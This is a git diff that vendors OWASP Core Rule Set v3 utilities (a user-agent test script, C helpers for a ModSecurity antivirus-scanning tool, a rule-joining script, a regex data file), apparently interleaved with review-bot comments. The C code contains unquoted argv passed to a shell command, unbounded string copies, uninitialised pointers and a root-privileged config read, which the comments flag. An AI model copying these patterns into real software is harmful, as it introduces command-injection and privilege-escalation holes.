+ input_data = ruleset.Input(method="GET", protocol="http",port=80,uri='/',dest_addr="localhost",headers={"Host":"localhost","User-Agent":useragent})
+ http_ua = http.HttpUA()
+ http_ua.send_request(input_data)
+ status = http_ua.response_object.status
+ if status == 403:
+ status_403 += 1
+ else:
+ status_not_403 += 1
+ x = (status_403/(len(useragent_list)*1.0))*100
+ y = (status_not_403/(len(useragent_list)*1.0))*100
+ print "403s =", x
+ print "not 403s =", y
+
+
+def main():
+ uas = read_useragents('./data/popularUAs.data')
+ run_requests(uas)
+main()
diff --git a/src/common/core/modsecurity/files/coreruleset/util/README b/src/common/core/modsecurity/files/coreruleset-v3/util/README
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/README
rename to src/common/core/modsecurity/files/coreruleset-v3/util/README
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.c b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.c
new file mode 100755
index 000000000..e7ba76069
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.c
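Review bot: `main()` is called unconditionally at module level, so merely importing this file (for example by a test collector scanning the directory) opens `./data/popularUAs.data` and starts sending requests to localhost; guard the call with `if __name__ == "__main__": main()`. `read_useragents` also never closes the handle it opens; `with open(filename, 'r') as f:` would. `run_requests` divides by `len(useragent_list)` without checking for an empty list, and the file mixes `print(...)` calls with Python 2 `print "403s =", x` statements, so it only runs under Python 2.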
@@ -0,0 +1,652 @@ +#include "common.h" + +int lock_file(char *filename) +{ + int fd; + + if (!filename) + return -1; + + if ((fd = open(filename,O_RDONLY | O_CREAT , S_IRWXU)) < 0) { + print_error("lock_file","open",modsec_rpc_log_file,errno); + return -1; + } + + flock(fd,LOCK_EX); + + return fd; +} + +int unlock_file(int fd) +{ + flock(fd,LOCK_UN); + return 0; +} + +int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) +{ + char time_str[64], line[1024*1024]; + time_t t; + int fd; + int i; + + switch (atoi(modsec_rpc_log_level)) { + case DEBUG: + time(&t); + ctime_r(&t,time_str); + time_str[strlen(time_str)-1] = '\0'; + if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { + print_error("print_request","open",modsec_rpc_log_file,errno); + fd=2; + } + flock(fd,LOCK_EX); + sprintf(line,"%s:REQUEST-BEGIN:======================================\n",time_str); + line[1024*1024-1]='\0'; + write(fd,line,strlen(line)); + snprintf(line,1024*1024,"URL:%s\nCommand:%s\n",url,command); + line[1024*1024-1]='\0'; + write(fd,line,strlen(line)); + for (i=0; i 0 && output) output[0]='\0'; + if (!(fp=popen(command,"r"))) { + print_error("run_cmd","popen",command,errno); + return -1; + } + + while (output_size && fgets(line,output_size>1024?1024:output_size,fp)) { + strcat(output, line); + output_size -= strlen(line); + } + + if (!output_size) + while (fgets(line,1024,fp)); + + pclose(fp); + return 0; +} + +int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters) +{ + int i, idx=-1; + + for (i = 0; (i < max_parameters) && (idx < 0); i++) + if ( strstr(parameters[i].name,parameter_name) ) + idx=i; + return idx; +} + +int parse_file(char *filename, parameter_t *parameters, int max_parameters) +{ + char line[1024], *ptr; + int i; + FILE *fp; + + if (!max_parameters || (parameters == NULL) || (filename == NULL)) { + print_error("parse_file","invalid input 
parameters","none",0); + return 0; + } + + if ((fp = fopen(filename,"r")) == NULL ) { + print_error("parse_file","fopen",filename,errno); + return 0; + } + + i=0; + while ( i < max_parameters && fgets(line,1024,fp)) { + if (ptr = strstr(line,"#")) + *ptr='\0'; + if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) + continue; + i++; + } + + fclose(fp); + + return i; +} + +int change_file(char *filename, parameter_t parameter) +{ + char line[1024], *name, *value; + int i, found=0; + FILE *fp; + + if (filename == NULL) + return 0; + + if ((fp = fopen(filename,"r+")) == NULL ) + return 0; + + i=0; + while ( fgets(line,1024,fp)) { + sscanf(line,"%[^=]=%s",name,value); + if (name && !strcmp(name,parameter.name)) { + fprintf(fp,"%s=%s\n",name,parameter.value); + found=1; + continue; + } else fprintf(fp,"%s",line); + } + + fclose(fp); + return found; +} + +int copy_file(char *src_file, char *dst_file) +{ + char line[1024]; + FILE *sfp, *dfp; + + if (src_file == NULL || dst_file == NULL) + return 0; + + if ((sfp = fopen(src_file,"r")) == NULL ) + return 0; + + if ((dfp = fopen(dst_file,"w")) == NULL ) { + fclose(sfp); + return 0; + } + + while ( fgets(line,1024,sfp)) + fprintf(dfp,"%s",line); + + fclose(sfp); + fclose(dfp); + return 1; +} + +int parse_query(char *query, parameter_t *parameters, int max_parameters) +{ + char *ptr, *dst_ptr, num[3]; + int i, len; + + if (!max_parameters || (parameters == NULL) || (query == NULL)) + return 0; + + ptr=query; + i=0; + while ((i < max_parameters) && *ptr) { + parameters[i].name[0] = '\0'; + dst_ptr = parameters[i].name; + len=0; + while (*ptr && (*ptr != '=') && (len++ < MAX_NAME_LENGTH)) { + if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { + num[0]=*(ptr+1); + num[1]=*(ptr+2); + num[2]='\0'; + ptr += 3; + *dst_ptr=(char)strtol(num,NULL,16); + if (*dst_ptr) dst_ptr++; + } else *dst_ptr++ = *ptr++; + } + if (len >= MAX_NAME_LENGTH) + while (*ptr && (*ptr != '=')) + *ptr++; + if (*ptr) ptr++; + *dst_ptr = '\0'; + 
parameters[i].value[0] = '\0'; + dst_ptr = parameters[i].value; + len=0; + while (*ptr && (*ptr != '&') && (len++ < MAX_VALUE_LENGTH)) { + if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { + num[0]=*(ptr+1); + num[1]=*(ptr+2); + num[2]='\0'; + ptr += 3; + *dst_ptr=(char)strtol(num,NULL,16); + if (*dst_ptr) dst_ptr++; + } else *dst_ptr++ = *ptr++; + } + if (len >= MAX_VALUE_LENGTH) + while (*ptr && (*ptr != '&')) + *ptr++; + if (*ptr) ptr++; + *dst_ptr = '\0'; + i++; + } + + return i; +} + +int parse_query_and_body (parameter_t *parameters, int max_parameters) +{ + char *query, *content_length_env; + int i, num_of_params, body_len, content_length; + + query = getenv("QUERY_STRING"); + if (query && *query) + return(parse_query(query,parameters,max_parameters)); + else { + content_length_env = getenv("CONTENT_LENGTH"); + if (!content_length_env) + return 0; + if (! *content_length_env) + return 0; + content_length=atol(content_length_env); + if (!(query=malloc(content_length+1))) + return 0; + i = 1; body_len=0; + while ( (body_len < content_length) && (i>0) ) { + i = read(0,query+body_len,(content_length-body_len)<1024?(content_length-body_len):1024); + if (i > 0 ) body_len+=i; + } + query[body_len] = '\0'; + num_of_params = parse_query(query,parameters,max_parameters); + free(query); + return num_of_params; + } +} + +int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]) +{ + char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH]; + int i, num_of_params=0; + + if (num_of_args > 0) + for (i=0; i0) ) { + i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); + if (i > 0 ) reply_len+=i; + } + reply[reply_len] = '\0'; + + shutdown(sock,SHUT_RDWR); + close(sock); + return reply_len; +} + +int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) +{ + int i, idx=-1; + + for (i = 0; (i < num_of_ips) && (idx < 0); i++) + if ( strstr(blocklist[i].ip,ip) ) + idx=i; + return idx; +} + +int 
remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) +{ + int i, j, idx=-1; + time_t t; + + time(&t); + for (i = 0; i < num_of_ips; i++) + if ( (ip && strstr(blocklist[i].ip,ip)) || (!ip && (t > blocklist[i].end)) ) { + idx=i; + for (j=i; j<(num_of_ips-1); j++) { + strcpy(blocklist[j].ip,blocklist[j+1].ip); + blocklist[j].start = blocklist[j+1].start; + blocklist[j].duration = blocklist[j+1].duration; + blocklist[j].end = blocklist[j+1].end; + strcpy(blocklist[j].token,blocklist[j+1].token); + } + num_of_ips--; + } + return idx; +} + +int read_conf_file (char *filename) +{ + int idx, num_of_params; + parameter_t parameters[MAX_PARAMS]; + + num_of_params=parse_file(filename,parameters,MAX_PARAMS); + + if ((idx = find_param_idx("MODSEC_CLI_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_cli_home,parameters[idx].value); + if ((idx = find_param_idx("MODSEC_RPC_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_home,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_FILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_file,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_level,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_SSL_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_ssl_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_SENSOR_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_sensor_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_REVERSEPROXY_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_reverseproxy_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_EXTERNALNIC_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_externalnic_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_MUI_LOCKFILE",parameters,num_of_params)) >= 0) + 
strcpy(modsec_rpc_mui_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_level,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_home,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_IP",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ip,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_PORT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_port,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_NETWORK_PREFIX",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_network_prefix,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_BIN",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_bin,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_CONF",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_conf,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXT_NIC",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ext_nic,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_PID",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_pid,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_WHITELIST",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_whitelist,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_BLACKLIST",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_blacklist,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_TIMEOUT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_timeout,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXCHANGE",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_exchange,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXT_IPS",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ext_ips,parameters[idx].value); + + 
if ((idx = find_param_idx("MODSEC_MUI_UI_ADMIN",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_admin,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_PASSWORD_FILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_password_file,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_IPADDRESS",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_ipaddress,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_PORT",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_port,parameters[idx].value); + + if ((idx = find_param_idx("SENSOR_ID",parameters,num_of_params)) >= 0) + strcpy(sensor_id,parameters[idx].value); + + if ((idx = find_param_idx("SERIAL",parameters,num_of_params)) >= 0) + strcpy(serial,parameters[idx].value); + + if ((idx = find_param_idx("VERSION_NUMBER",parameters,num_of_params)) >= 0) + strcpy(version_number,parameters[idx].value); + + if ((idx = find_param_idx("RELEASE_DATE",parameters,num_of_params)) >= 0) + strcpy(release_date,parameters[idx].value); + + if ((idx = find_param_idx("BRIDGE_MODE",parameters,num_of_params)) >= 0) + strcpy(bridge_mode,parameters[idx].value); + + if ((idx = find_param_idx("DATA_DISK_SPACE",parameters,num_of_params)) >= 0) + strcpy(data_disk_space,parameters[idx].value); + + if ((idx = find_param_idx("CONN_RATE",parameters,num_of_params)) >= 0) + strcpy(conn_rate,parameters[idx].value); + + if ((idx = find_param_idx("CONN_RATE_PER_ADDR",parameters,num_of_params)) >= 0) + strcpy(conn_rate_per_addr,parameters[idx].value); + + if ((idx = find_param_idx("CONNS",parameters,num_of_params)) >= 0) + strcpy(conns,parameters[idx].value); + + if ((idx = find_param_idx("CONNS_PER_ADDR",parameters,num_of_params)) >= 0) + strcpy(conns_per_addr,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY",parameters,num_of_params)) >= 0) + 
strcpy(modsec_proxy,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_SCRIPT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_script,parameters[idx].value); + + return num_of_params; +} + +int init_cgi() +{ + char *modsec; + + setresuid(0,0,0); + setresgid(0,0,0); + + strcpy(modsec_cli_home,"/opt/modsecurity-cli"); + strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); + strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); + strcpy(modsec_rpc_log_level,"0"); + strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock"); + strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock"); + strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock"); + strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock"); + strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock"); + strcpy(modsec_proxy_home,"/opt/modsecurity-proxy"); + strcpy(modsec_proxy_ip,"127.0.0.2"); + strcpy(modsec_proxy_port,"80"); + strcpy(modsec_proxy_bin,"/bin/modsec-proxyd"); + strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy"); + strcpy(modsec_proxy_conf,"/etc/httpd.conf"); + strcpy(modsec_proxy_ext_nic,"eth0"); + strcpy(modsec_proxy_network_prefix,"172.16.0.0/12"); + strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid"); + strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf"); + strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf"); + strcpy(modsec_proxy_timeout,"120"); + strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange"); + strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf"); + strcpy(modsec_mui_ui_ipaddress,"127.0.0.1"); + strcpy(modsec_mui_ui_port,"443"); + strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd"); + strcpy(modsec_mui_ui_admin,"admin"); + strcpy(sensor_id,"1"); + strcpy(serial,"1"); + strcpy(version_number,"2.0"); + strcpy(bridge_mode,"off"); + 
strcpy(data_disk_space,"60"); + strcpy(release_date,"11-15-2006"); + strcpy(conn_rate,"0"); + strcpy(conn_rate_per_addr,"0"); + strcpy(conns,"0"); + strcpy(conns_per_addr,"0"); + + if (modsec = getenv("MODSEC")) + read_conf_file(modsec); + else { + if (!read_conf_file("/opt/breach/etc/modsec.conf")) + read_conf_file("/etc/modsec.conf"); + } + + return 0; +} diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/common.h b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.h similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/common.h rename to src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.h diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/comp b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/comp similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runAV/comp rename to src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/comp diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV-clamd.c b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV-clamd.c new file mode 100755 index 000000000..83319fdca --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV-clamd.c 
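Review bot: In `change_file`, `sscanf(line,"%[^=]=%s",name,value)` stores through `char *name, *value`, which are declared but never pointed at a buffer, so the first parsed line writes through uninitialised pointers; they should be arrays at least as large as `line`, e.g. `char line[1024], name[1024], value[1024];`. `read_conf_file` then copies every configuration value into its global with an unbounded `strcpy`; the destination sizes are declared in common.h, which this hunk does not show, so each copy needs a length check against its target. This matters more than usual because `init_cgi` calls `setresuid(0,0,0)` and `setresgid(0,0,0)` and afterwards reads whatever file the `MODSEC` environment variable names, so if the binary is installed with elevated privileges a caller-chosen config file is parsed as root. Since this is a legacy utility carried along with the rule set, it is worth checking whether `util/av-scanning/runAV/` needs to be shipped at all.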
@@ -0,0 +1,48 @@
+#include "common.h"
+
+main(int argc, char *argv[])
+{
+ char cmd[MAX_OUTPUT_SIZE];
+ char output[MAX_OUTPUT_SIZE];
+ int error;
+ char *colon;
+ char *keyword;
+
+ if (argc > 1) {
+ sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]);
+ output[0] = '\0';
+ error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
+ if (error != 0) {
+ printf ("1 exec error %d: OK", error);
+ } else if (!*output) {
+ printf ("1 exec empty: OK");
+ }
+ else {
+ colon = strstr(output, ":");
+ if (colon) { colon += 2; }
+ if (!colon) {
+ printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd);
+ }
+ else if (keyword = strstr(colon, " FOUND")) {
+ *keyword = '\0';
+ printf ("0 clamdscan: %s", colon);
+ }
+ else if (keyword = strstr(colon, " ERROR")) {
+ *keyword = '\0';
+ printf ("0 clamdscan: %s", colon);
+ }
+ else if (keyword = strstr(colon, "OK")) {
+ printf ("1 clamdscan: OK");
+ }
+ else if (keyword = strstr(colon, "Empty file")) {
+ printf ("1 empty file");
+ }
+ else if (keyword = strstr(colon, "Can't access file ")) {
+ printf ("0 invalid file %s", keyword+18);
+ }
+ else {
+ printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd);
+ }
+ }
+ }
+}
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV.c b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV.c
new file mode 100755
index 000000000..1bbf76307
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/runAV.c
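Review bot: In main(), `sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]);` copies an unbounded argv[1] into the fixed `cmd[MAX_OUTPUT_SIZE]` buffer and places it unquoted in a command string handed to run_cmd(). An over-long path can overrun the stack buffer, and if run_cmd() goes through a shell (its body is not in this hunk) a path carrying shell metacharacters would be interpreted rather than scanned. At minimum bound the write with `if (snprintf(cmd, sizeof cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]) >= (int)sizeof cmd) { printf("0 path too long"); return 1; }` and reject paths outside an expected character set, or better, start the scanner with an argument vector instead of a command string. The `error != 0` and empty-output branches also print a leading `1` with "OK", the same prefix the clean result uses, so a scanner that fails to run appears to be reported as a pass; confirm this fail-open behaviour is intended. The same lines appear in the runAV.c hunk that follows, and since this looks like a vendored coreruleset utility the fix may belong upstream, or the helper could be left out of the shipped tree.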
@@ -0,0 +1,48 @@
+#include "common.h"
+
+main(int argc, char *argv[])
+{
+ char cmd[MAX_OUTPUT_SIZE];
+ char output[MAX_OUTPUT_SIZE];
+ int error;
+ char *colon;
+ char *keyword;
+
+ if (argc > 1) {
+ sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
+ output[0] = '\0';
+ error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
+ if (error != 0) {
+ printf ("1 exec error %d: OK", error);
+ } else if (!*output) {
+ printf ("1 exec empty: OK");
+ }
+ else {
+ colon = strstr(output, ":");
+ if (colon) { colon += 2; }
+ if (!colon) {
+ printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd);
+ }
+ else if (keyword = strstr(colon, " FOUND")) {
+ *keyword = '\0';
+ printf ("0 clamscan: %s", colon);
+ }
+ else if (keyword = strstr(colon, " ERROR")) {
+ *keyword = '\0';
+ printf ("0 clamscan: %s", colon);
+ }
+ else if (keyword = strstr(colon, "OK")) {
+ printf ("1 clamscan: OK");
+ }
+ else if (keyword = strstr(colon, "Empty file")) {
+ printf ("1 empty file");
+ }
+ else if (keyword = strstr(colon, "Can't access file ")) {
+ printf ("0 invalid file %s", keyword+18);
+ }
+ else {
+ printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd);
+ }
+ }
+ }
+}
diff --git a/src/common/core/modsecurity/files/coreruleset/util/av-scanning/runav.pl b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runav.pl
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/av-scanning/runav.pl
rename to src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runav.pl
diff --git a/src/common/core/modsecurity/files/coreruleset/util/browser-tools/js-overrides.js b/src/common/core/modsecurity/files/coreruleset-v3/util/browser-tools/js-overrides.js
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/browser-tools/js-overrides.js
rename to src/common/core/modsecurity/files/coreruleset-v3/util/browser-tools/js-overrides.js
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/IdNumbering.csv b/src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/IdNumbering.csv
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/IdNumbering.csv
rename to src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/IdNumbering.csv
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/README b/src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/README
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/README
rename to src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/README
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/update.py b/src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/update.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs2-renumbering/update.py
rename to src/common/core/modsecurity/files/coreruleset-v3/util/crs2-renumbering/update.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/geo-location/README b/src/common/core/modsecurity/files/coreruleset-v3/util/geo-location/README
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/geo-location/README
rename to src/common/core/modsecurity/files/coreruleset-v3/util/geo-location/README
diff --git a/src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/README.md b/src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/README.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/README.md
rename to src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/README.md
diff --git a/src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/mlogc-honeypot-sensor.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/mlogc-honeypot-sensor.conf
rename to src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/mlogc-honeypot-sensor.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf b/src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
rename to src/common/core/modsecurity/files/coreruleset-v3/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/id-range b/src/common/core/modsecurity/files/coreruleset-v3/util/id-range
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/id-range
rename to src/common/core/modsecurity/files/coreruleset-v3/util/id-range
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/join-multiline-rules/join.py b/src/common/core/modsecurity/files/coreruleset-v3/util/join-multiline-rules/join.py
new file mode 100755
index 000000000..95c96c2b1
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/join-multiline-rules/join.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+#
+# This script reads all the rule files passed on the command line,
+# and outputs them, with each (multi-line) directive joined as a
+# single line.
+#
+# This can be used to work around a bug in Apache < 2.4.11 in
+# parsing long configuration directives.
+#
+# Usage:
+#
+# util/join-multiline-rules/join.py rules/*.conf > rules/rules.conf.joined
+#
+# This produces a single 'rules.conf.joined' file that can be included
+# in buggy Apache versions. It is recommended to keep this file in the
+# rules/ directory (because it refers to .data files in that directory)
+# but give it a name not ending in .conf (so the file will not be
+# included in *.conf and you can re-run the command multiple times
+# without including its own output).
+#
+# Example:
+#
+# SecRule &TX:paranoia_level "@eq 0" \
+# "id:901120,\
+# phase:1,\
+# pass,\
+# nolog,\
+# setvar:tx.paranoia_level=1"
+#
+# will be outputted as:
+#
+# SecRule &TX:paranoia_level "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.paranoia_level=1"
+#
+
+import fileinput, sys
+
+for line in fileinput.input():
+ line = line.strip()
+ if line == '':
+ sys.stdout.write("\n")
+ continue
+
+ if line[-1] == '\\':
+ sys.stdout.write(line[0:-1])
+ else:
+ sys.stdout.write(line)
+ sys.stdout.write("\n")
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/920600.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/920600.data
new file mode 100644
index 000000000..26baeb2bd
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/920600.data
@@ -0,0 +1,101 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regexp_assemble/.
+
+##! The expression generated from this file matches a full HTTP
+##! `Accept` header by following the specification as far as
+##! necessary, while restricting the `charset` parameter
+##! to a list of explicitly allowed values.
+##! Where possible, the expression matches tokens "loosely",
+##! to reduce complexity and the risk of false positives.
+
+##! Specifications:
+##! https://httpwg.org/specs/rfc7231.html#request.conneg
+##! https://httpwg.org/specs/rfc7230.html
+
+##!^ ^
+##!$ $
+
+##! Helpers
+##!> template non-token-with-dquote-chars (),/:;<=>?![\x5c\]{}
+
+##!> template non-token-chars \"{{non-token-with-dquote-chars}}
+
+##!> template token-chars [^{{non-token-chars}}]
+
+##!> template token-with-dquote-chars [^{{non-token-with-dquote-chars}}]
+
+##!> template type-subtype (?:\*|{{token-chars}}+)
+
+##!> template media-type {{type-subtype}}/{{type-subtype}}
+
+##! list of allowed charsets
+ ##!> assemble
+(?:"?
+ ##!=>
+ ##!> include allowed-charsets
+ ##!=>
+\b"?))
+ ##!=< allowed-charsets
+ ##!<
+
+
+##! Main assembly
+ ##!> assemble
+(?:{{media-type}})
+ ##!=>
+(?:\s*+;\s*+
+ ##!=>
+(?:(?:charset\s*+=\s*+
+ ##!=>
+ ##!=> allowed-charsets
+
+ ##! If the first part wasn't a "charset", then
+ ##! anything is allowed here that is not "charset".
+ ##! Note that this doesn't follow the RFC strictly.
+|(?:
+ ##!=>
+[^c{{non-token-chars}}]{{token-chars}}*
+c[^h{{non-token-chars}}]{{token-chars}}*
+ch[^a{{non-token-chars}}]{{token-chars}}*
+cha[^r{{non-token-chars}}]{{token-chars}}*
+char[^s{{non-token-chars}}]{{token-chars}}*
+chars[^e{{non-token-chars}}]{{token-chars}}*
+charse[^t{{non-token-chars}}]{{token-chars}}*
+ ##!=>
+)\s*+=\s*+{{token-with-dquote-chars}}+)
+ ##! Clients like to violate the RFC, be lenient with
+ ##! terminating semi-colons.
+;?
+ ##!=>
+)*
+ ##!=>
+
+ ##! Multiple "media-range" expressions can be
+ ##! specified, comma separated.
+(?:\s*+,\s*+
+ ##!=>
+(?:{{media-type}})
+ ##!=>
+(?:\s*+;\s*+
+ ##!=>
+(?:(?:charset\s*+=\s*+
+ ##!=>
